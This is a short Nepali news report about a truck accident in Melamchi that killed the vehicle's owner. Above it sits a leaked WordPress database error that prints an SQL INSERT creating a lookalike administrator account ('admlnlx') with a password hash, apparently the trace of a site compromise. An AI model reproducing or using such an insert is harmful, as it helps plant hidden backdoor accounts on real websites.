WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjLLwjCLrkayo0DURkENJU/lo.3wmd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:43:38', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । मेलम्ची नगरपालिका–१० शिखरपुरमा महेन्द्रा निसान ट्रक दुर्घटना हुँदा एकको मृत्यु भएको छ । आज बिहान ८ः३० बजे बा२ख ३६८९ नंको महेन्द्रा निसान ट्रकबाट सामान झार्दै गर्दा क्लज थिचिएर ट्रक दुर्घटना भएको इलाका प्रहरी कार्यालय मेलम्चीका प्रहरी निरीक्षक टीकाराम राइले जानकारी दिए ।
ट्रक लगभग १०० मिटर तल पुगेको स्थानीयवासीले बताएका छन् । जुगल गाउँपालिका सेलाङका अन्दाजी ३३ वर्षीय कमल कार्कीको मृत्यु भएको निरीक्षक राईले बताउनुभयो । कार्की गाडीधनी हुन् । अहिले प्रहरीले घटनास्थल पुगेर घटनाको अनुसन्धान गरिरहेको छ ।